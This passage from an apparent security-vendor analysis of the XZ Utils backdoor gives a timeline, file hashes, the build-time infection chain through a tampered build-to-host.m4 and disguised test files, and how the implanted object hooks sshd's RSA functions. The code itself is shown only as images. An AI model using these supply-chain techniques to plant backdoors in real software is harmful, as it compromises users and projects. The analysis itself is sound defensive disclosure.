  1990. 2024.03.28 bug is discovered, Debian and RedHat notified<br />
  1991. 2024.03.28 Debian <a href="https://tracker.debian.org/news/1515519/accepted-xz-utils-561really545-1-source-into-unstable/" target="_blank" rel="noopener">rolls back</a> XZ 5.6.1 to 5.4.5-0.2 version<br />
  1992. 2024.03.29 an email is <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4" target="_blank" rel="noopener">published</a> on the OSS-security mailing list<br />
  1993. 2024.03.29 RedHat confirms backdoored XZ was <a href="https://www.redhat.com/en/blog/urgent-security-alert-fedora-41-and-rawhide-users" target="_blank" rel="noopener">shipped</a> in Fedora Rawhide and Fedora Linux 40 beta<br />
  1994. 2024.03.30 Debian <a href="https://fulda.social/@Ganneff/112184975950858403" target="_blank" rel="noopener">shuts down</a> builds and starts process to rebuild it<br />
  1995. 2024.04.02 XZ main developer <a href="https://tukaani.org/xz-backdoor/" target="_blank" rel="noopener">recognizes </a>the backdoor incident</p>
  1996. <h2 id="backdoored-source-distributions">Backdoored source distributions</h2>
  1997. <p><strong>xz-5.6.0</strong></p>
  1998. <table width="100%">
  1999. <tbody>
  2000. <tr>
  2001. <td width="15%"><strong>MD5</strong></td>
  2002. <td width="85%"><a href="https://opentip.kaspersky.com/c518d573a716b2b2bc2413e6c9b5dbde/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">c518d573a716b2b2bc2413e6c9b5dbde</a></td>
  2003. </tr>
  2004. <tr>
  2005. <td><strong>SHA1</strong></td>
  2006. <td>e7bbec6f99b6b06c46420d4b6e5b6daa86948d3b</td>
  2007. </tr>
  2008. <tr>
  2009. <td><strong>SHA256</strong></td>
  2010. <td>0f5c81f14171b74fcc9777d302304d964e63ffc2d7b634ef023a7249d9b5d875</td>
  2011. </tr>
  2012. </tbody>
  2013. </table>
  2014. <p><strong>xz-5.6.1</strong></p>
  2015. <table width="100%">
  2016. <tbody>
  2017. <tr>
  2018. <td width="15%"><strong>MD5</strong></td>
  2019. <td width="85%"><a href="https://opentip.kaspersky.com/5aeddab53ee2cbd694f901a080f84bf1/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">5aeddab53ee2cbd694f901a080f84bf1</a></td>
  2020. </tr>
  2021. <tr>
  2022. <td><strong>SHA1</strong></td>
  2023. <td>675fd58f48dba5eceaf8bfc259d0ea1aab7ad0a7</td>
  2024. </tr>
  2025. <tr>
  2026. <td><strong>SHA256</strong></td>
  2027. <td>2398f4a8e53345325f44bdd9f0cc7401bd9025d736c6d43b372f4dea77bf75b8</td>
  2028. </tr>
  2029. </tbody>
  2030. </table>
  2031. <h2 id="initial-infection-analysis">Initial infection analysis</h2>
  2032. <p>The XZ git repository contains a set of test files that are used when testing the compressor/decompressor code to verify that it&#8217;s working properly. The account named Jia Tan or &#8220;<a href="https://github.com/JiaT75" target="_blank" rel="noopener">jiaT75</a>&#8220;, <a href="https://github.com/tukaani-project/xz/commit/cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0" target="_blank" rel="noopener">committed</a> two test files that initially appeared harmless, but served as the bootstrap to implant backdoor.</p>
  2033. <p>The associated files were:</p>
  2034. <ul>
  2035. <li><strong>bad-3-corrupt_lzma2.xz</strong> (<a href="https://opentip.kaspersky.com/86fc2c94f8fa3938e3261d0b9eb4836be289f8ae/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">86fc2c94f8fa3938e3261d0b9eb4836be289f8ae</a>)</li>
  2036. <li><strong>good-large_compressed.lzma</strong> (<a href="https://opentip.kaspersky.com/540c665dfcd4e5cfba5b72b4787fec4f/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">50941ad9fd99db6fca5debc3c89b3e899a9527d7</a>)</li>
  2037. </ul>
  2038. <p>These files were intended to contain shell scripts and the backdoor binary object itself. However, they were hidden within the malformed data, and the attacker knew how to properly extract them when needed.</p>
  2039. <h3>Stage 1 &#8211; The modified <strong>build-to-host</strong> script</h3>
  2040. <p>When the XZ release is ready, the official Github repository distributes the project&#8217;s source files. Initially, these releases on the repository, aside from containing the malicious test files, were harmless because they don&#8217;t get the chance to execute. However, the attacker appears to have only added the malicious code that bootstrap the infection when the releases were sourced from <strong>https://xz[.]tukaani.org</strong>, which was under the control of Jia Tan.</p>
  2041. <p>This URL is used by most distributions, and, when downloaded, it comes with a file named <strong>build-to-host.m4</strong> that contains malicious code.</p>
  2042. <p><strong>build-to-host.m4 </strong>(<a href="https://opentip.kaspersky.com/b4dd2661a7c69e85f19216a6dbbb1664/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">c86c8f8a69c07fbec8dd650c6604bf0c9876261f</a>) is executed during the build process and executes a line of code that fixes and decompresses the first file added to the tests folder:</p>
  2043. <div id="attachment_112357" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145102/XZ_backdoor_analysis_09.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112357" class="size-large wp-image-112357" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145102/XZ_backdoor_analysis_09-1024x167.png" alt="Deobfuscated line of code in build-to-host.m4" width="1024" height="167" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145102/XZ_backdoor_analysis_09-1024x167.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145102/XZ_backdoor_analysis_09-300x49.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145102/XZ_backdoor_analysis_09-768x125.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145102/XZ_backdoor_analysis_09-740x121.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145102/XZ_backdoor_analysis_09-800x130.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145102/XZ_backdoor_analysis_09.png 1246w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112357" class="wp-caption-text">Deobfuscated line of code in build-to-host.m4</p></div>
  2044. <p>This line of code replaces the &#8220;broken&#8221; data from <strong>bad-3-corrupt_lzma2.xz</strong> using the <strong>tr</strong> command, and pipes the output to the <strong>xz -d</strong> command, which decompresses the data. The decompressed data contains a shell script that will be executed later using <strong>/bin/bash</strong>, triggered by this <strong>.m4</strong> file.</p>
  2045. <h3 id="stage-2-the-injected-shell-script">Stage 2 &#8211; The injected shell script</h3>
  2046. <p>The malicious script injected by the malicious <strong>.m4</strong> file verifies that it&#8217;s running on a Linux machine and also that it&#8217;s running inside the intended build process.</p>
  2047. <div id="attachment_112358" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112358" class="size-large wp-image-112358" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-1024x229.png" alt="Injected script contents" width="1024" height="229" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-1024x229.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-300x67.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-768x171.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-1536x343.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-1568x350.png 1568w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-740x165.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-1255x280.png 1255w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10-800x179.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145150/XZ_backdoor_analysis_10.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112358" class="wp-caption-text">Injected script contents</p></div>
  2048. <p>To execute the next stage, it uses <strong>good-large_compressed.lzma</strong>, which is indeed compressed correctly with XZ, but contains junk data inside the decompressed data.</p>
  2049. <p>The junk data removal procedure is as follows: the <strong>eval</strong> function executes the head pipeline, with each <strong>head</strong> command either ignoring the next 1024 bytes or extracting the next 2048 or 724 bytes.</p>
  2050. <p>In total, these commands extracted <strong>33,492 </strong>bytes (<strong>2048*16 + 724 </strong>bytes). The <strong>tail</strong> command then retains the final <strong>31,265 </strong>bytes of the file and ignores the rest.</p>
  2051. <p>Then, the <strong>tr</strong> command applies a basic substitution to the output to deobfuscate it. The second XZ command decompresses the transformed bytes as a raw <strong>lzma </strong>stream, after which the result is piped into shell.</p>
  2052. <h3 id="stage-3-backdoor-extraction">Stage 3 &#8211; Backdoor extraction</h3>
  2053. <p>The last stage shell script performs many checks to ensure that it is running in the expected environment, such as whether the project is configured to use <a href="https://sourceware.org/glibc/wiki/GNU_IFUNC" target="_blank" rel="noopener">IFUNC</a> (which will be discussed in the next sections).</p>
  2054. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145253/XZ_backdoor_analysis_13.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112359" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145253/XZ_backdoor_analysis_13-1024x83.png" alt="" width="1024" height="83" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145253/XZ_backdoor_analysis_13-1024x83.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145253/XZ_backdoor_analysis_13-300x24.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145253/XZ_backdoor_analysis_13-768x62.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145253/XZ_backdoor_analysis_13-740x60.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145253/XZ_backdoor_analysis_13-800x65.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145253/XZ_backdoor_analysis_13.png 1110w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  2055. <p>Many of the other checks performed by this stage include determining whether GCC is used for compilation or if the project contains specific files that will be used by the script later on.</p>
  2056. <p>In this stage, it extracts the backdoor binary code itself, an <a href="https://www.gnu.org/software/guile/manual/html_node/Object-File-Format.html" target="_blank" rel="noopener">object file</a> that is currently hidden in the same <strong>good-large_compressed.lzma</strong> file, but at a different offset.</p>
  2057. <p>The following code handles this:</p>
  2058. <div id="attachment_112360" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145335/XZ_backdoor_analysis_12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112360" class="size-large wp-image-112360" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145335/XZ_backdoor_analysis_12-1024x160.png" alt="Partial command used by the last script stage" width="1024" height="160" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145335/XZ_backdoor_analysis_12-1024x160.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145335/XZ_backdoor_analysis_12-300x47.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145335/XZ_backdoor_analysis_12-768x120.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145335/XZ_backdoor_analysis_12-740x115.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145335/XZ_backdoor_analysis_12-800x125.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145335/XZ_backdoor_analysis_12.png 1392w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112360" class="wp-caption-text">Partial command used by the last script stage</p></div>
  2059. <p>The extraction process operates through a sequence of commands, with the result of each command serving as the input for the next one. The formatted one-liner code is shown below:</p>
  2060. <div id="attachment_112361" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112361" class="size-large wp-image-112361" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04-1024x742.png" alt="Formatted backdoor extraction one-liner" width="1024" height="742" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04-1024x742.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04-300x217.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04-768x556.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04-483x350.png 483w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04-740x536.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04-387x280.png 387w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04-800x580.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145406/XZ_backdoor_analysis_04.png 1397w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112361" class="wp-caption-text">Formatted backdoor extraction one-liner</p></div>
  2061. <p>Initially, the file <strong>good-large_compressed.lzma</strong> is extracted using the <strong>XZ</strong> tool itself. The subsequent steps involve calling a chain of <strong>head</strong> calls with the &#8220;<strong>eval $i&#8221;</strong> function (same as the stage 3 extraction).</p>
  2062. <p>Then a custom RC4-like algorithm is used to decrypt the binary data, which contains another compressed file. This compressed file is also extracted using the XZ utility. The script then removes some bytes from the beginning of the decompressed data using predefined values and saves the result to disk as <strong>liblzma_la-crc64-fast.o</strong>, which is the backdoor file used in the linking process.</p>
  2063. <p>Finally, the script modifies the function <strong>is_arch_extension_supported</strong> from the <strong>crc_x86_clmul.h</strong> file in <strong>liblzma</strong>, to replace the call to the <strong>__get_cpuid</strong> function with <strong>_get_cpuid</strong>, removing one underscore character.</p>
  2064. <p>This modification allows it to be linked into the library (we&#8217;ll discuss this in more detail in the next section). The whole build infection chain can be summarized in the following scheme:</p>
  2065. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112362" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-1024x531.png" alt="" width="1024" height="531" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-1024x531.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-300x156.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-768x398.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-1536x796.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-675x350.png 675w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-740x384.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-540x280.png 540w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14-800x415.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145446/XZ_backdoor_analysis_14.png 1645w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  2066. <h2 id="binary-backdoor-analysis">Binary backdoor analysis</h2>
  2067. <h3 id="a-stealth-loading-scenario">A stealth loading scenario</h3>
  2068. <p>In the original XZ code, there are two special functions used to calculate the CRC of the given data: <strong>lzma_crc32 </strong>and <strong>lzma_crc64</strong>. Both of these functions are stored in the ELF symbol table with type <a href="https://sourceware.org/glibc/wiki/GNU_IFUNC" target="_blank" rel="noopener">IFUNC</a>, a feature provided by the GNU C Library (GLIBC). IFUNC allows developers to dynamically select the correct function to use. This selection takes place when the dynamic linker loads the shared library.</p>
  2069. <p>The reason XZ uses this is that it allows for determining whether an optimized version of the <strong>lzma_crcX </strong>function should be used or not. The optimized version requires special features from modern processors (CLMUL, SSSE3, SSE4.1). These special features need to be verified by issuing the <strong>cpuid </strong>instruction, which is called using the <a href="https://github.com/gcc-mirror/gcc/blob/6f9ba3ea55477cf1bd3d37e40ad116150c06a75e/gcc/config/i386/cpuid.h#L324" target="_blank" rel="noopener"><strong>__get_cpuid</strong></a> wrapper/intrinsic provided by GLIBC, and it&#8217;s at this point the backdoor takes advantage to load itself.</p>
  2070. <p>The backdoor is stored as an object file, and its primary goal is to be linked to the main executable during compilation. The object file contains the <strong>_get_cpuid</strong> symbol, as the injected shell scripts remove one underscore symbol from the original source code, which means that when the code calls <strong>_get_cpuid</strong>, it actually calls the backdoor&#8217;s version of it.</p>
  2071. <div id="attachment_112363" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112363" class="size-large wp-image-112363" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07-1024x392.png" alt="Backdoor code entry point" width="1024" height="392" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07-1024x392.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07-300x115.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07-768x294.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07-915x350.png 915w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07-740x283.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07-732x280.png 732w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07-800x306.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145548/XZ_backdoor_analysis_07.png 1302w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112363" class="wp-caption-text">Backdoor code entry point</p></div>
  2072. <h3 id="backdoor-code-analysis">Backdoor code analysis</h3>
  2073. <p>The initial backdoor code is invoked twice, as both <strong>lzma_crc32</strong> and <strong>lzma_crc64</strong> use the same modified function (<strong>_get_cpuid</strong>). To ensure control over this, a simple counter is created to verify that the code has already been executed. The actual malicious activity starts when the <strong>lzma_crc64</strong> IFUNC invokes <strong>_get_cpuid</strong>, sees the counter value 1 indicating that that the function has already been accessed, and initiates one final step to redirect to the true entry point of this malware.</p>
  2074. <div id="attachment_112364" style="width: 864px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112364" class="size-large wp-image-112364" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-854x1024.png" alt="Backdoor initialization" width="854" height="1024" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-854x1024.png 854w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-250x300.png 250w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-768x921.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-168x200.png 168w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-292x350.png 292w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-740x887.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-233x280.png 233w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01-751x900.png 751w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145625/XZ_backdoor_analysis_01.png 964w" sizes="(max-width: 854px) 100vw, 854px" /></a><p id="caption-attachment-112364" class="wp-caption-text">Backdoor initialization</p></div>
  2075. <p>To initialize the malicious code, the backdoor first initializes a couple of structures that hold core information about the current running process. Primarily, it locates the Global Offset Table (<a href="https://en.wikipedia.org/wiki/Global_Offset_Table">GOT</a>) address using hardcoded offsets, and uses this information to find the <strong>cpuid</strong> pointer inside it.</p>
  2076. <div id="attachment_112365" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112365" class="size-large wp-image-112365" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-1024x381.png" alt="GOT modification code" width="1024" height="381" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-1024x381.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-300x112.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-768x286.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-1536x572.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-940x350.png 940w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-740x276.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-752x280.png 752w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03-800x298.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11145711/XZ_backdoor_analysis_03.png 1678w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112365" class="wp-caption-text">GOT modification code</p></div>
  2077. <p>The GOT contains the offsets of symbols, including the <strong>cpuid</strong> wrapper. The backdoor then swaps the pointers to the main malware function, and calls it as if it were calling <strong>cpuid</strong>.</p>
  2078. <h3 id="core-behavior">Core behavior</h3>
  2079. <p>The main goal of the backdoor is to successfully hook specific functions that will allow it to monitor every connection to the infected machine. The targeted functions include:</p>
  2080. <table width="100%">
  2081. <tbody>
  2082. <tr>
  2083. <td width="30%"><strong>Targeted function</strong></td>
  2084. <td width="70%"><strong>Description</strong></td>
  2085. </tr>
  2086. <tr>
  2087. <td><strong>RSA_public_decrypt</strong></td>
  2088. <td>Used by <strong>libcrypto</strong> to decrypt a ciphertext signed by a private key</td>
  2089. </tr>
  2090. <tr>
  2091. <td><strong>EVP_PKEY_set1_RSA</strong></td>
  2092. <td>Used by <strong>libcrypto</strong> to set the RSA key of a given context</td>
  2093. </tr>
  2094. <tr>
  2095. <td><strong>RSA_get0_key</strong></td>
  2096. <td>Used by <strong>libcrypto</strong> to retrieve an RSA key</td>
  2097. </tr>
  2098. </tbody>
  2099. </table>
  2100. <p>However, hooking all these functions is not a simple and straightforward task for the backdoor. It involves accessing many internal structures and manipulating process-specific structures until it achieves its goal, and it also needs to be as stealthy as possible, which means that the malicious code contains multiple checks to avoid being analyzed.</p>
  2101. <h3 id="execution-environment-check">Execution environment check</h3>
  2102. <p>It first parses <strong>ld-linux</strong> (dynamic linker), which is primarily responsible for dynamically resolving symbol addresses in memory. It also extracts various information about the environment and verifies that the current process the backdoor is running in matches its execution criteria, which are:</p>
  2103. <ul>
  2104. <li>The current process is <strong>/usr/bin/sshd</strong></li>
  2105. <li>Check if the kill switch is present</li>
  2106. </ul>
  2107. <p>It extracts the name of the current process from <strong>argv[0]</strong> and also parses all the process environment variables to see if any of them are present in its internal string table. If a match is found, or the process is not <strong>sshd</strong>, the malware halts its execution.</p>
  2108. <div id="attachment_112366" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112366" class="size-large wp-image-112366" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15-1024x864.png" alt="Process environment check" width="1024" height="864" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15-1024x864.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15-300x253.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15-768x648.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15-415x350.png 415w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15-740x624.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15-332x280.png 332w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15-800x675.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150105/XZ_backdoor_analysis_15.png 1299w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112366" class="wp-caption-text">Process environment check</p></div>
  2109. <p>The only variable inside its own table is <strong>yolAbejyiejuvnup=Evjtgvsh5okmkAvj</strong>, which in this context serves as a <strong>kill switch</strong>.</p>
  2110. <h3 id="the-trie-structure">The trie structure</h3>
  2111. <p>One of the distinctive features of the backdoor is the use of a single <a href="https://en.wikipedia.org/wiki/Trie" target="_blank" rel="noopener">trie</a> structure for string operations. Instead of directly comparing strings or using string hashes to match a particular constant (for example, the name of a library function), the code performs a trie lookup, and checks if the result is equal to a certain constant number. For example, the magic value for the ELF header results in the trie returning <strong>0x300</strong>, and the name of the <strong>system</strong> function is matched with a return value of <strong>0x9F8</strong>. Trie is not just used for comparisons: certain functions that use pointers to strings (for example, <strong>ssh-2.0</strong>) search for these strings in the host binary using the trie, so there will be no suspicious data in the backdoor&#8217;s body.</p>
  2112. <p>The implementation of the trie uses 16-byte bitmasks, each half corresponding to the byte input ranges <strong>0x00-0x3F</strong> and <strong>0x40-0x7F</strong>, and 2-byte trie leaf nodes, 3 bits of which are flags (direction, termination) and the rest is reserved for the value (or the location of the next node).</p>
  2113. <div id="attachment_112367" style="width: 658px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150150/XZ_backdoor_analysis_16.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112367" class="size-full wp-image-112367" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150150/XZ_backdoor_analysis_16.png" alt="Part of the trie lookup function that performs the bitmap match" width="648" height="275" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150150/XZ_backdoor_analysis_16.png 648w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150150/XZ_backdoor_analysis_16-300x127.png 300w" sizes="(max-width: 648px) 100vw, 648px" /></a><p id="caption-attachment-112367" class="wp-caption-text">Part of the trie lookup function that performs the bitmap match</p></div>
  2114. <h3 id="symbol-resolver">Symbol resolver</h3>
  2115. <p>There are at least three symbol resolver-related routines used by the backdoor to locate the ELF Symbol structure, which holds information such as the symbol name and its offset. All symbol resolver functions receive a key to be searched in the trie.</p>
